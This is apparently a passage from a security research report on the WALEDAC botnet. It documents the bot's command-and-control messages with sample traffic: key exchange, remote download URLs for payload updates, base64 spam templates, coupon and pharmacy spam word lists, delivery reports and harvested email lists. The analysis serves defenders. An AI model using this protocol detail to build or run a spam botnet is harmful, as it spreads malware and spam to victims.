<lm> <t>getkey</t> <v>34</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> -----BEGIN CERTIFICATE----- MIIBvjCCASegAwIBAgIBADANBgkqhkiG9w0BAQQFADAlMQswCQYDVQQGEwJVSzEWMBQGA1UEAxMNT3BlblNTTCBHcm91cDAeFw0wOTA0MDIwMzMyMjdaFw0xMDA0MDIwMzMyMjdaMCUxCzAJBgNVBAYTAlVLMRYwFAYDVQQDEw1PcGVuU1NMIEdyb3VwMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5OTlAxThR1/j7H6VwKFK7KsmDs1EZ41xOrLH8/FIslyKF18D8Lb8Nq2k9uwOvznkqsLuH6PRWDkQ87KYJlcYE5ap1JqSQeQtAcE/QjNrl26h/zzlQHJxS3tueDuFOz3i8Uojf+xPgO77owo6dqM8MII6tjJGjlNxU9raVToJqvwIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAC3maGn2YwKueDgK90SZWwnjQgNkWoD+DDNpOAvrQKNUDL1tiiWmSubm6z5kFmA1FYJq5gG3hykzlWw3npFW3b4wnMyAm5l3u3eJM0vuYNPL64mIeurXdOlJnTybnm7Rk0zk9YbT6XPYqt8eoCX9uEOSlhZSDEQ9csDreJX49XFk -----END CERTIFICATE----- </props> </lm>

SAMPLE REPLY

<lm> <v>34</v> <t>getkey</t> <props> NqWX5VZ/w/Lr7wAkGwtITkYuwb4PuuUoEAS/7RqFOx0mUiwmSBH3sjH3p01KiRcAFG08LE5i8mu48DYGsgLDtvIVu8GLZesFWHjVwcyWqUNPXHvqDXpJu5cb63xtKUlSPQH4YMqGVXvdIfYU7JHKys5r3p37sRCStWvOx0HSgRw= </props> </lm>

of 66



Command Type: 01 (FIRST)

SAMPLE POST

<lm> <t>first</t> <v>34</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> mirabella 5.1.2600 </props> </lm>

SAMPLE REPLY

<lm> <v>34</v> <t>first</t> <props> </props> </lm>

Command Type: 02 (NOTIFY)

SAMPLE POST

<lm> <t>notify</t> <v>34</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> mirabella_site Wed Apr 15 10:52:39 2009 Wed Apr 15 17:47:38 2009 Wed Apr 15 17:47:39 2009 199423859 </props> </lm>

The WALEDAC Botnet



SAMPLE REPLY

<lm> <v>34</v> <t>notify</t> <props> wergvan 203.177.193.xxx 203.144.255.71 209.85.135.27 3600 13 2000 true <![CDATA[337|update|http://usabreakingnews.com/mir.jpg340|download|http:// usabreakingnews.com/win.jpg]]> </props> <dns_zones></dns_zones> <dns_hosts></dns_hosts> <socks5></socks5> <dos></dos> <filter></filter> </lm>


SAMPLE POST

<lm> <t>taskreq</t> <v>34</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props></props> </lm>

SAMPLE REPLY

<lm> <v>27</v> <t>taskreq</t>

of 66



<props></props> <tasks> <task id=“4”> <body>UmVjZWl2ZWQ6IGZyb20gJV5DMCVeUCVeUjMtNl4lOnF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tXiVeJSAoWyVeQzYlXkleJS4lXkleJS4lXkleJS4lXkleJV4lXSkKCWJ5ICVeQV4lICVeRnNlbmRtYWlsdmVyXiUgd2l0aCBTTVRQIGlkICVeWSVeQzUlXlIyMC0zMDBeJV4lXiUwNjQ3OTY7CgklXkQlXlY1XiVeJQpNZXNzYWdlLUlEOiA8JV5aXiUuJV5SMS05XiUwJV5SMC05XiUwJV5SMC05XiUwJV5SMC05XiVAJV5DMSVeRmRvbWFpbnNeJV4lPgpEYXRlOiAlXkReJQpGcm9tOiAiJV5GbXluYW1lc14lICVeRnN1cm5hbWVzXiUiIDwlXkZuYW1lc14lQCVeVjFeJT4KVXNlci1BZ2VudDogVGh1bmRlcmJpcmQgJV5GdHJ1bnZlcl4lCk1JTUUtVmVyc2lvbjogMS4wClRvOiAlXjBeJQpTdWJqZWN0OiAlXkZwaGFybWFeJQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47IGNoYXJzZXQ9SVNPLTg4NTktMTsgZm9ybWF0PWZsb3dlZApDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA3Yml0CgolXkolXkZwaGFybWFeJSBodHRwOi8vJV5QJV5SMi02XiU6cXdlcnR5dWlvcGFzZGZnaGprbHp4Y3Zibm1ldWlvYV4lLiVeRnBoYXJtYV9saW5rc14lL14lCg==</body> <a>[email protected]</a> <a>[email protected]</a> <a>[email protected]</a> <a>[email protected]</a> … … … <w>charset</w> <w>cupo_file</w> <w>cupo_link</w> <w>cupo_string</w> <w>domains</w> <w>mynames</w> <w>names</w> <w>outver</w> <w>outver.5</w> <w>outver.6</w> <w>pharma</w> <w>pharma_links</w> <w>sendmailver</w> <w>surnames</w> <w>svcver</w> <w>trunver</w> </task> <task id=“3”> <body>JV5IMyVeRnZhbGVfY29tcGFueV4lXiUlXkg0JV5GbXluYW1lc14lXiVSZWNlaXZlZDogZnJvbSAlXkMwJV5QJV5SMy02XiU6cXdlcnR5dWlvcGFzZGZnaGprbHp4Y3Zibm1eJV4lIChbJV5DNiVeSV4lLiVeSV4lLiVeSV4lLiVeSV4lXiVdKSBieSAlXkFeJSB3aXRoIE1pY3Jvc29mdCBTTVRQU1ZDKCVeRnN2Y3Zlcl4lKTsgJV5EXiUKTWVzc2FnZS1JRDogcomputerVeTyVeVjZeJTolXlIzLTUwXiVeJSVeVjBeJT4KRnJvbTogIiVeVjReJSIgcomputerVeRm5hbWVzXiVAJV5GZG9tYWluc14lPgpUbzogcomputerVeMF4lPgpTdWJqZWN0OiAlXkZjdXBvX3N0cmluZ14lCkRhdGU6ICVeRC0lXlIzMC02MDBeJV4lCk1JTUUtVmVyc2lvbjogMS4wCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsKCWZvcm1hdD1mbG93ZWQ7CgljaGFyc2V0PSIlXkZjaGFyc2V0XiUiOwoJcmVwbHktdHlwZT1vcmlnaW5hbApDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiA3Yml0ClgtUHJpb3JpdHk6IDMKWC1NU01haWwtUHJpb3JpdHk6IE5vcm1hbApYLU1haWxlcjogTWljcm9zb2Z0IE91dGxvb2sgRXhwcmVzcyA2LjAwLiVeQzclXkZvdXR2ZXIuNl4lXiUKWC1NaW1lT0xFOiBQcm9kdWNlZCBCeSBNaWNyb3NvZnQgTWltZU9MRSBWNi4wMC4lXlY3XiUKCiVeSiVeRmN1cG9fc3RyaW5nXiUgaHR0cDovLyVeUCVeUjItNl4lOnF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tZXl1aW9hXiUuJV5GY3Vwb19saW5rXiUvJV5GY3Vwb19maWxlXiUucGhwXiUK</body>

of 66



<a>[email protected]</a> <a>[email protected]</a> <a>[email protected]</a> <a>[email protected]</a> … … … <w>charset</w> <w>cupo_file</w> <w>cupo_link</w> <w>cupo_string</w> <w>domains</w> <w>mynames</w> <w>names</w> <w>outver</w> <w>outver.5</w> <w>outver.6</w> <w>pharma</w> <w>pharma_links</w> <w>sendmailver</w> <w>surnames</w> <w>svcver</w> <w>trunver</w> </task> </tasks> <words> <w name=“trunver” time=“1234183272”/> <w name=“pharma” time=“1236690754”/> <w name=“svcver” time=“1233919248”/> <w name=“outver” time=“1233919245”/> <w name=“domains” time=“1236988929”/> <w name=“names” time=“1236989403”/> <w name=“charset” time=“1233919243”/> <w name=“pharma_links” time=“1236989413”/> <w name=“mynames” time=“1233919245”/> <w name=“outver.6” time=“1233919246”/> <w name=“cupo_string” time=“1235331549”/> <w name=“surnames” time=“1233919247”/> <w name=“outver.5” time=“1233919246”/> <w name=“cupo_file” time=“1235336882”/> <w name=“sendmailver” time=“1233919247”/> <w name=“cupo_link” time=“1235404378”/> </words> </lm>

of 66



Command Type: 04 (WORDS)

SAMPLE CUPO_STRING POST

<lm> <t>words</t> <v>33</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> cupo_string </props> </lm>

SAMPLE CUPO_LINK POST

<lm> <t>words</t> <v>33</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> cupo_link </props> </lm>

SAMPLE CUPO_FILE POST

<lm> <t>words</t> <v>33</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> cupo_file </props> </lm>

The WALEDAC Botnet



SAMPLE CUPO_STRING REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“cupo_string”> <![CDATA[20-95 % off! Best shops! A good way to cut down on costs A good way to save money is to use these coupons A special discount voucher listing … … … Hot deals in your city Hottest coupons for you I discovered a great deal I found a fantastic bargain I found great sales I guess you’ll need it … … … You’ll be glad to see this You’ll thank me You’ll thank me for this!]]> </word> </lm>

SAMPLE CUPO_LINK REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“cupo_link”> <![CDATA[thecoupondiscount.com greatcouponclub.com codecouponsite.com yourcountycoupon.com bestcouponfree.com smartsalesgroup.com greatsalestax.com supersalesonline.com greatsalesgroup.com greatsalesavailable.com]]> </word> </lm>

The WALEDAC Botnet



SAMPLE CUPO_FILE REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“cupo_file”> <![CDATA[coupons coupon list discounts saleslist salelist sale couponlist couponslist disc sales print save run stopcrisis nocrisis]]> </word> </lm>

SAMPLE MYNAMES REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“mynames”> <![CDATA[Abel Abraham Ada Adalbert Adam Adrian Agatha … … … Win Winifred Winnie]]> </word> </lm>

of 66



SAMPLE NAMES REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“names”> <![CDATA[a.slinko abc action1 actionsurveys activation_test admin … … … zadm-dm]]> </word> </lm>

SAMPLE DOMAINS REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“domains”> <![CDATA[6c.com 9orange.com aapt.com.au abbaye67.be acronet.co.jp ad.hm.edu admin.ufl.edu … … … xs4all.nl yahoo.com]]> </word> </lm>

The WALEDAC Botnet



SAMPLE CHARSET REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“charset”> <![CDATA[windows-1252 windows-1250 iso-8859-1 iso-8859-2]]> </word> </lm>

SAMPLE OUTVER REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“outver”> <![CDATA[2800.1106 2800.1106 2800.1106 2800.1106 2900.2180 2900.2180 2900.2180 2800.1158 2800.1437 2800.1409 2800.1506 2800.1807]]> </word> </lm>

SAMPLE TRUNVER REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“trunver”> <![CDATA[2.0.0.9 (Windows/20071031) 1.5.0.14 (Windows/20071210)]]> </word> </lm>

of 66



SAMPLE SENDMAILVER REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“sendmailver”> <![CDATA[(8.13.1/8.13.1) (8.13.2/8.13.2) (8.13.3/8.13.3) (8.13.4/8.13.4) (8.13.5/8.13.5) (8.13.6/8.13.6)]]> </word> </lm>

SAMPLE SVCVER REPLY

<lm> <v>33</v> <t>words</t> <props></props> <word name=“svcver”> <![CDATA[6.0.3790.0 5.0.2195.6713 6.0.3790.211 5.0.2195.6713 6.0.3790.0 6.0.3790.1830 5.0.2195.5329 6.0.3790.0 5.0.2195.6713 5.0.2195.4905]]> </word> </lm>


This command reports to WALEDAC proxies the email addresses to which it has successfully sent spam.

The WALEDAC Botnet



SAMPLE POST

<lm> <t>taskreq</t> <v>34</v> 1302b4463f55063a6c293a55412a820e <r>0</r> <props> true </props> <reports> <rep id=“4” rcpt=“YnJlbmRhLmxhcnNlbkBjYW5hZGFwb3N0LmNh”>RVJS</rep> <rep id=“4” rcpt=“bWFnaWNhbGtpcmFAeWFob28uY28uanA=“>RVJS</rep> <rep id=“4” rcpt=“c3VlZEBtY3BpbnMuY29t”>RVJS</rep> <rep id=“4” rcpt=“YnJ1Y2UuZS5yaWVkZUB1bmlsZXZlci5jb20=“> T0s=</rep> <rep id=“4” rcpt=“ZC5wcnp5Ynl0bmlha0ByemVjenBvc3BvbGl0YS5wbA==“>T0s=</rep> … … … <rep id=“4” rcpt=“bmljaG9sYXMuYWxlc2V2aWNoQHBvbHljb20uY29t”>RVJS</rep> <rep id=“4” rcpt=“dmVua2F0LmphbGFnYW1AZ21haWwuY29t”>RVJS</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>OK</rep> <rep id=“4” rcpt=“[email protected]”>OK</rep> … … … <rep id=“4” rcpt=“[email protected]”>ERR</rep> <rep id=“4” rcpt=“[email protected]”>ERR</rep></reports> </lm>

Command Type: 07

SAMPLE POST

<lm> <t>emails</t> <v>33</v> f354c452d248956636628b3210726273 <r>0</r> <props></props> <emails> <![CDATA[[email protected] [email protected] [email protected] [email protected]

of 66



[email protected] [email protected] [email protected] [email protected] [email protected] [email protected] … … … [email protected]]]> </emails> </lm>

SAMPLE REPLY

<lm> <v>33</v> <t>emails</t> <props></props> </lm>

Command Type: NONE

SAMPLE POST

<lm> <localtime>1235869809</localtime> <nodes> <node ip=“195.96.244.xx” port=“80” time=“1235869344”> a111e9168a33ea4ff47c84243b428e0a</node> <node ip=“70.79.134.xx” port=“80” time=“1235869165”> e867ea6c84678350156ae142651ed116</node> <node ip=“83.2.246.xxx” port=“80” time=“1235869077”> 2867497c3053ca7c7a619f09845e0348</node> <node ip=“80.51.135.xx” port=“80” time=“1235869014”> 6870617e2a34a621db62b11f7d4f2116</node> … … … <node ip=“5.236.20.xxx” port=“80” time=“1235868066”> ca523476545a8d06096d5059b7517f1b</node> </nodes> </lm>

The WALEDAC Botnet



REFERENCES

» NNL-labs. http://www.nnl-labs.com/cblog/ » sudosecure.net. http://www.sudosecure.net/WALEDAC/index.php » shadowserver.org. http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081231 » SecureWorks—Joe Stewart. http://www.blackhat.com/presentations/bh-usa-08/Stewart/

BH_US_08_Stewart_Protocols_of_the_Storm.pdf » honeynet.org. http://www.honeynet.org/node/325 and http://www.honeynet.org/node/348 » Openssl. http://www.openssl.org » Wikipedia. http://en.wikipedia.org/wiki/RSA » Wikipedia. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard » Wikipedia. http://en.wikipedia.org/wiki/bzip2 » TinyXml. http://www.grinninglizard.com/tinyxml/index.html » TinyXML. http://sourceforge.net/projects/tinyxml/ » Pycrypto. http://www.amk.ca/python/code/crypto.html » Pycrypto. http://www.dlitz.net/software/pycrypto/ » Pycrypto. http://www.voidspace.org.uk/python/modules.shtml#pycrypto » Spamhaus Statistics: The Top 10. http://www.spamhaus.org/statistics/spammers.lasso

PICTURE CREDITS

» Trend Micro Malware Blog

infiltrating waledac botnet's covert operations

Documents